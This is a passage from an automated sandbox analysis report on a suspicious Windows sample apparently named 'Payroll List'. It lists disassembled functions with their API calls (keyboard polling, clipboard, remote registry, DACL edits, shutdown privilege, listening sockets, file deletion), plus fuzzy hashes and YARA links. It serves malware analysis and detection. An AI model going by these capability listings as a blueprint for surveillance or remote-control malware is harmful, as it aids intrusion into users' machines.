                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                    • String ID: *.*
                                                                    • API String ID: 1803514871-438819550
                                                                    • Opcode ID: 8c7073c89d30f44dee7f642c7575229b10f4e54c56e921778a0fb300cd5e0c14
                                                                    • Instruction ID: f58915aed3a13ffb5ccb7dc38705792a94649efcb06cf6e7bfbefa664f04d60b
                                                                    • Opcode Fuzzy Hash: 8c7073c89d30f44dee7f642c7575229b10f4e54c56e921778a0fb300cd5e0c14
                                                                    • Instruction Fuzzy Hash: 7A31E8325006197BCF159FF4EC49ADE77BC9F06320F108596E81AE3490EB70DF858A64
                                                                    Function 00171C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00171CAB
                                                                    • _wcscmp.LIBCMT ref: 00171CC0
                                                                    • _wcscmp.LIBCMT ref: 00171CD7
                                                                      • Part of subcall function 00166BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00166BEF
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00171D06
                                                                    • FindClose.KERNEL32(00000000), ref: 00171D11
                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00171D2D
                                                                    • _wcscmp.LIBCMT ref: 00171D54
                                                                    • _wcscmp.LIBCMT ref: 00171D6B
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00171D7D
                                                                    • SetCurrentDirectoryW.KERNEL32(001D39FC), ref: 00171D9B
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00171DA5
                                                                    • FindClose.KERNEL32(00000000), ref: 00171DB2
                                                                    • FindClose.KERNEL32(00000000), ref: 00171DC2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                    • String ID: *.*
                                                                    • API String ID: 1824444939-438819550
                                                                    • Opcode ID: 88a59f4e228ebe5ae1aa968c88eb14f2273ec259d3823d6902107b254f949f1f
                                                                    • Instruction ID: 51e0f3d6dd6320d94e9271f422fccc5722f12febfe4c1a910d81c682794594aa
                                                                    • Opcode Fuzzy Hash: 88a59f4e228ebe5ae1aa968c88eb14f2273ec259d3823d6902107b254f949f1f
                                                                    • Instruction Fuzzy Hash: 8C3108325006197ACF25AFE8EC4DADE77BD9F06324F108552E819A3190DB70DE85CF50
                                                                    Function 00127D19 Relevance: 23.7, APIs: 2, Strings: 11, Instructions: 962COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                                    • API String ID: 2102423945-2023335898
                                                                    • Opcode ID: a9fc929894ea281d579eddfd39bb80a47fb23af6dcf7b5fbb00c3177684e3841
                                                                    • Instruction ID: f455905a4f2f748f9354521835264e1fa1f1c1c211d7fb42c6d8ff31fda363dd
                                                                    • Opcode Fuzzy Hash: a9fc929894ea281d579eddfd39bb80a47fb23af6dcf7b5fbb00c3177684e3841
                                                                    • Instruction Fuzzy Hash: C682B271D04229DFCF28CF98D8807AEB7B1BF49314F268169D819AB391E7749D91CB90
                                                                    Function 0017091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLocalTime.KERNEL32(?), ref: 001709DF
                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 001709EF
                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 001709FB
                                                                    • __wsplitpath.LIBCMT ref: 00170A59
                                                                    • _wcscat.LIBCMT ref: 00170A71
                                                                    • _wcscat.LIBCMT ref: 00170A83
                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00170A98
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00170AAC
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00170ADE
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00170AFF
                                                                    • _wcscpy.LIBCMT ref: 00170B0B
                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00170B4A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                    • String ID: *.*
                                                                    • API String ID: 3566783562-438819550
                                                                    • Opcode ID: 5df644c0603593ccf705a25455383693fab1cfe836c779398cd14af6f37a51cf
                                                                    • Instruction ID: 15c5cd93c946ba4746c4edcd04b9c6e6de54061167d3cd3b5be18761f42f45e9
                                                                    • Opcode Fuzzy Hash: 5df644c0603593ccf705a25455383693fab1cfe836c779398cd14af6f37a51cf
                                                                    • Instruction Fuzzy Hash: 3C6148B25043059FDB10EF60D8859AEB3E8FF99314F04891EFA89C7251DB31EA45CB92
                                                                    Function 0015A66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0015ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0015ABD7
                                                                      • Part of subcall function 0015ABBB: GetLastError.KERNEL32(?,0015A69F,?,?,?), ref: 0015ABE1
                                                                      • Part of subcall function 0015ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0015A69F,?,?,?), ref: 0015ABF0
                                                                      • Part of subcall function 0015ABBB: HeapAlloc.KERNEL32(00000000,?,0015A69F,?,?,?), ref: 0015ABF7
                                                                      • Part of subcall function 0015ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0015AC0E
                                                                      • Part of subcall function 0015AC56: GetProcessHeap.KERNEL32(00000008,0015A6B5,00000000,00000000,?,0015A6B5,?), ref: 0015AC62
                                                                      • Part of subcall function 0015AC56: HeapAlloc.KERNEL32(00000000,?,0015A6B5,?), ref: 0015AC69
                                                                      • Part of subcall function 0015AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0015A6B5,?), ref: 0015AC7A
                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0015A6D0
                                                                    • _memset.LIBCMT ref: 0015A6E5
                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0015A704
                                                                    • GetLengthSid.ADVAPI32(?), ref: 0015A715
                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 0015A752
                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0015A76E
                                                                    • GetLengthSid.ADVAPI32(?), ref: 0015A78B
                                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0015A79A
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0015A7A1
                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0015A7C2
                                                                    • CopySid.ADVAPI32(00000000), ref: 0015A7C9
                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0015A7FA
                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0015A820
                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0015A834
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                    • String ID:
                                                                    • API String ID: 3996160137-0
                                                                    • Opcode ID: f4b94fe31a0356dd939f5330285942948fe6ee4648f119afa450fbf46df7b5fd
                                                                    • Instruction ID: 40ce4f1d9278688685818e5081e56c84b4c79854c21705fc134ad45425b21d9d
                                                                    • Opcode Fuzzy Hash: f4b94fe31a0356dd939f5330285942948fe6ee4648f119afa450fbf46df7b5fd
                                                                    • Instruction Fuzzy Hash: F5516C71940209EFDF00CFA0DC44AEEBBB9FF05305F448229F921AB690DB359A09CB61
                                                                    Function 001663F9 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 89fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00166EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00165FA6,?), ref: 00166ED8
                                                                      • Part of subcall function 001672CB: GetFileAttributesW.KERNEL32(?,00166019), ref: 001672CC
                                                                    • _wcscat.LIBCMT ref: 00166441
                                                                    • __wsplitpath.LIBCMT ref: 0016645F
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00166474
                                                                    • _wcscpy.LIBCMT ref: 001664A3
                                                                    • _wcscat.LIBCMT ref: 001664B8
                                                                    • _wcscat.LIBCMT ref: 001664CA
                                                                    • DeleteFileW.KERNEL32(?), ref: 001664DA
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 001664EB
                                                                    • FindClose.KERNEL32(00000000), ref: 00166506
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                    • String ID: \*.*$p1Wu`KXu
                                                                    • API String ID: 2643075503-2866000061
                                                                    • Opcode ID: 6305a76533cc2851c92400f2edd32b83dfd0c25ecccd47c8f69ea2b49297b151
                                                                    • Instruction ID: 447d21e62486af48739deec7d218d6a1ac9ffbc63ee9c0189bea8a278b376d89
                                                                    • Opcode Fuzzy Hash: 6305a76533cc2851c92400f2edd32b83dfd0c25ecccd47c8f69ea2b49297b151
                                                                    • Instruction Fuzzy Hash: A83180B2408384AAC721DBA48C859DBB7DCAF6A310F44096EF6D9C3141EB35D54DC7A7
                                                                    Function 00126F07 Relevance: 18.4, Strings: 14, Instructions: 883COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                    • API String ID: 0-4052911093
                                                                    • Opcode ID: 88bcb022ac72c482327691f15cef27e681889049a8179214b6581de202d26520
                                                                    • Instruction ID: 235b16c282fbed2675149281724a16bc805461e5d4dfe52b7180812ccb4615bc
                                                                    • Opcode Fuzzy Hash: 88bcb022ac72c482327691f15cef27e681889049a8179214b6581de202d26520
                                                                    • Instruction Fuzzy Hash: F8729475E04229DBDF28CF98D8407AEB7B5FF19310F15416AE815EB281DB709E81DB90
                                                                    Function 001831BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00183C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00182BB5,?,?), ref: 00183C1D
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0018328E
                                                                      • Part of subcall function 0012936C: __swprintf.LIBCMT ref: 001293AB
                                                                      • Part of subcall function 0012936C: __itow.LIBCMT ref: 001293DF
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0018332D
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 001833C5
                                                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00183604
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00183611
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                    • String ID:
                                                                    • API String ID: 1240663315-0
                                                                    • Opcode ID: d9dc88edc7470f361b08045a38ce476b641301e97ec6b6663c9d939ffec02840
                                                                    • Instruction ID: 8f070fdd658258ec0adae8e3702423e78c5552a04100aa899754f9588974e4b6
                                                                    • Opcode Fuzzy Hash: d9dc88edc7470f361b08045a38ce476b641301e97ec6b6663c9d939ffec02840
                                                                    • Instruction Fuzzy Hash: A3E14A31604210AFCB14EF28D991E2ABBE9FF89710F08856DF55AD7261DB30EA05CF91
                                                                    Function 00162B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?), ref: 00162B5F
                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00162BE0
                                                                    • GetKeyState.USER32(000000A0), ref: 00162BFB
                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00162C15
                                                                    • GetKeyState.USER32(000000A1), ref: 00162C2A
                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00162C42
                                                                    • GetKeyState.USER32(00000011), ref: 00162C54
                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00162C6C
                                                                    • GetKeyState.USER32(00000012), ref: 00162C7E
                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00162C96
                                                                    • GetKeyState.USER32(0000005B), ref: 00162CA8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: State$Async$Keyboard
                                                                    • String ID:
                                                                    • API String ID: 541375521-0
                                                                    • Opcode ID: c56d1a69fd32c64cb6628a8249976cb629c75bfc9e7fe31c3e8c1341b753ffb6
                                                                    • Instruction ID: 76077ee99d3dfdacadc5465f687857305f211ee733e56d966cd44c5568be7a8a
                                                                    • Opcode Fuzzy Hash: c56d1a69fd32c64cb6628a8249976cb629c75bfc9e7fe31c3e8c1341b753ffb6
                                                                    • Instruction Fuzzy Hash: E541C774A04FC96DFF359B648C043F9BEA0AF12344F048059D9C6566C2DBB499E8C7A2
                                                                    Function 00176D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                    • String ID:
                                                                    • API String ID: 1737998785-0
                                                                    • Opcode ID: 8690a93c16b4175adf3b994f3034246fda00093515dfada841b1d3bd3bc1e771
                                                                    • Instruction ID: 95094b7ff6e5efdfc5e9be9efdc26d13f6fe8e34334fcbef3ab5f3baf4da47f4
                                                                    • Opcode Fuzzy Hash: 8690a93c16b4175adf3b994f3034246fda00093515dfada841b1d3bd3bc1e771
                                                                    • Instruction Fuzzy Hash: 96218B31300A10AFDB11AFA5EC49B6D77A8EF59710F04801AF94E9B6A1CB34EC408B95
                                                                    Function 0017C18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00159ABF: CLSIDFromProgID.OLE32 ref: 00159ADC
                                                                      • Part of subcall function 00159ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00159AF7
                                                                      • Part of subcall function 00159ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00159B05
                                                                      • Part of subcall function 00159ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00159B15
                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0017C235
                                                                    • _memset.LIBCMT ref: 0017C242
                                                                    • _memset.LIBCMT ref: 0017C360
                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0017C38C
                                                                    • CoTaskMemFree.OLE32(?), ref: 0017C397
                                                                    Strings
                                                                    • NULL Pointer assignment, xrefs: 0017C3E5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                    • String ID: NULL Pointer assignment
                                                                    • API String ID: 1300414916-2785691316
                                                                    • Opcode ID: 564b9a67e1ed3017a7c396f8c990e51174c7506c7f348741c257e408c1dbe6cb
                                                                    • Instruction ID: 7c47bd17b78acc9aa31d671ad91dac6de701d1e988fa15e224339ba2b8b37576
                                                                    • Opcode Fuzzy Hash: 564b9a67e1ed3017a7c396f8c990e51174c7506c7f348741c257e408c1dbe6cb
                                                                    • Instruction Fuzzy Hash: 4E913C71D00228EBDB10DFA4DC91EDEBBB9EF18750F10815AF919A7291DB705A45CFA0
                                                                    Function 001679D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0015B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0015B180
                                                                      • Part of subcall function 0015B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0015B1AD
                                                                      • Part of subcall function 0015B134: GetLastError.KERNEL32 ref: 0015B1BA
                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 00167A0F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                    • String ID: $@$SeShutdownPrivilege
                                                                    • API String ID: 2234035333-194228
                                                                    • Opcode ID: 5bc8add6fe30a0671afa7fc73d34420b0f076abcfbc2c72412ae35598348c6db
                                                                    • Instruction ID: 98757dcce9a1b2f79c33a92e15f67e8a2b293eae948a1403673322d0f1eb566e
                                                                    • Opcode Fuzzy Hash: 5bc8add6fe30a0671afa7fc73d34420b0f076abcfbc2c72412ae35598348c6db
                                                                    • Instruction Fuzzy Hash: B201F7716592216AF72C16B8EC8ABBF72589B00359F290524BD13E30C2D7A05E2081A0
                                                                    Function 00178C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00178CA8
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00178CB7
                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00178CD3
                                                                    • listen.WSOCK32(00000000,00000005), ref: 00178CE2
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00178CFC
                                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00178D10
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                                                    • String ID:
                                                                    • API String ID: 1279440585-0
                                                                    • Opcode ID: 3dc45d13a2552e88b2fcaf3bfddcb17ea3b3378c784ab452ae0f79ded34f3924
                                                                    • Instruction ID: 1ee5021eb46090946f70ff3a1194c8e06e6c13eea81f7978c5744f5652b67d25
                                                                    • Opcode Fuzzy Hash: 3dc45d13a2552e88b2fcaf3bfddcb17ea3b3378c784ab452ae0f79ded34f3924
                                                                    • Instruction Fuzzy Hash: 9D21E1316006109FCB14EFA8ED49B6EB7B9EF59324F148158F95BA72D2CB30AD41CB61
                                                                    Function 00166532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00166554
                                                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00166564
                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00166583
                                                                    • __wsplitpath.LIBCMT ref: 001665A7
                                                                    • _wcscat.LIBCMT ref: 001665BA
